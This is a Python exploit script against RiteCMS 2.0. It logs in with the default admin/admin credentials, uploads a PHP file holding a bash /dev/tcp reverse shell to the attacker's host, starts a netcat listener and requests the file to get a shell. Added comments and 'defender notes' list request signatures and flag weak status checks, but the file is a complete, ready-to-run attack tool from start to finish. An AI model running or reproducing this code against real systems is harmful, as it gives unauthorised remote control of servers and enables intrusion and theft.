import argparse
import requests
import subprocess
# Banner
def print_banner():
    """Print the tool's text banner to stdout.

    Takes no arguments and returns None; the banner is a fixed
    triple-quoted string that begins and ends with a newline.
    """
    print("""
##############################################################
# RiteCMS 2.0 Remote Code Execution #
# Author: PickleRick #
# https://github.com/pjobsina #
##############################################################
""")
# Parse command-line arguments
def parse_args():
    """Read the three mandatory CLI options and return them as a tuple.

    Returns:
        ``(ip, port, target)`` as plain strings, in that order: the
        listener IP, the listener port and the target IP. ``port`` is
        returned exactly as typed; no integer conversion or range check
        happens here.
    """
    cli = argparse.ArgumentParser(
        description='Exploit script to upload a reverse shell and execute it.'
    )
    # (short flag, long flag, help text) — registration order is kept so
    # the generated --help output is unchanged.
    required_options = (
        ('-i', '--ip', 'Your IP address'),
        ('-p', '--port', 'Your desired port'),
        ('-t', '--target', 'Target IP address'),
    )
    for short_flag, long_flag, help_text in required_options:
        cli.add_argument(short_flag, long_flag, required=True, help=help_text)
    parsed = cli.parse_args()
    return parsed.ip, parsed.port, parsed.target
# Main exploit function
def exploit(reverse_shell_ip, reverse_shell_port, target_ip):
    """Run the login -> file upload -> fetch sequence against ``target_ip``.

    Args:
        reverse_shell_ip: address interpolated verbatim into the uploaded
            PHP file (string).
        reverse_shell_port: port interpolated verbatim into the uploaded
            PHP file and into the local ``nc`` listener command (string).
        target_ip: host part of every URL below; the CMS is assumed to be
            reachable over plain HTTP under ``/cms/``.

    Returns:
        None. Progress is reported as ``[*]`` / ``[x]`` lines on stdout.
        Every success message is derived only from the HTTP status code
        (``Response.ok``); the response bodies are never inspected.

    Defender notes (all values are fixed in this function and therefore
    usable as log / WAF signatures): a POST to ``/cms/index.php`` carrying
    the default ``admin``/``admin`` credentials, a multipart POST to the
    file-manager ``upload`` action with the constant file name
    ``rev-shell.php`` and MIME type ``application/x-php``, a follow-up GET
    of ``/media/rev-shell.php``, and a Firefox 102 User-Agent on the two
    POSTs only.
    """
    # Prepare URLs and headers
    login_url = f'http://{target_ip}/cms/index.php'
    upload_url = f'http://{target_ip}/cms/index.php?mode=filemanager&action=upload&directory=media'
    execute_url = f'http://{target_ip}/media/rev-shell.php'
    # Browser-like headers; sent with the two POSTs below but NOT with the final GET.
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'keep-alive',
        'Referer': f'http://{target_ip}/cms/',
        'Upgrade-Insecure-Requests': '1',
        'Origin': f'http://{target_ip}',
    }
    # Login credentials (hard-coded vendor defaults; this is the "bypass" relied on)
    login_data = {'username': 'admin', 'userpw': 'admin'}
    # File content to upload: a one-line PHP file whose name is fixed, so the
    # target path /media/rev-shell.php is predictable.
    files = {
        'file': ('rev-shell.php', f"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/{reverse_shell_ip}/{reverse_shell_port} 0>&1'\"); ?>", 'application/x-php')
    }
    # Form data for uploading (mirrors the file-manager upload form fields)
    upload_data = {
        'mode': 'filemanager',
        'directory': 'media',
        'file_name': '',
        'upload_mode': '1',
        'resize_xy': 'x',
        'resize': '640',
        'compression': '80',
        'thumbnail_resize_xy': 'x',
        'thumbnail_resize': '150',
        'thumbnail_compression': '70',
        'upload_file_submit': 'OK - Upload file'
    }
    # One Session so the cookie set by the login POST is reused by the later requests.
    with requests.Session() as session:
        # Send POST request to log in
        login_response = session.post(login_url, headers=headers, data=login_data)
        # NOTE: .ok is True for any 2xx/3xx status; it does not prove the
        # credentials were accepted.
        if login_response.ok:
            print("[*] AUTHENTICATION BYPASSED!")
            # Use the same session for the upload
            upload_response = session.post(upload_url, headers=headers, files=files, data=upload_data)
            # NOTE(review): this line is printed before upload_response.ok is
            # checked, so it appears even when the upload failed.
            print(f"[*] SHELL UPLOADED!")
            if upload_response.ok:
                print("[*] REVERSE SHELL UPLOADED!")
                # Print and execute the Netcat listener command
                listener_command = f"rlwrap nc -nlvp {reverse_shell_port}"
                print(f"\n[*] STARTING NETCAT LISTENER:\n{listener_command}")
                # NOTE(review): shell=True with the user-supplied port spliced into
                # the command string; the Popen handle is discarded, so the listener
                # is never waited on or terminated by this script, and a missing
                # rlwrap/nc only surfaces as a shell error.
                subprocess.Popen(listener_command, shell=True)
                # Execute the uploaded reverse shell file: a plain GET without the
                # custom headers above, i.e. with the library's default User-Agent.
                execute_response = session.get(execute_url)
                if execute_response.ok:
                    print("[*] EXECUTION SUCCESSFUL!")
                else:
                    print("[x] EXECUTION FAILED!")
            else:
                print("[x] UPLOAD FAILED!")
        else:
            print("[x] LOGIN FAILED!")
if __name__ == '__main__':
    # Script entry point: banner, then parse the three CLI options and hand
    # them to exploit() in the same (ip, port, target) order parse_args() returns.
    print_banner()
    cli_args = parse_args()
    exploit(*cli_args)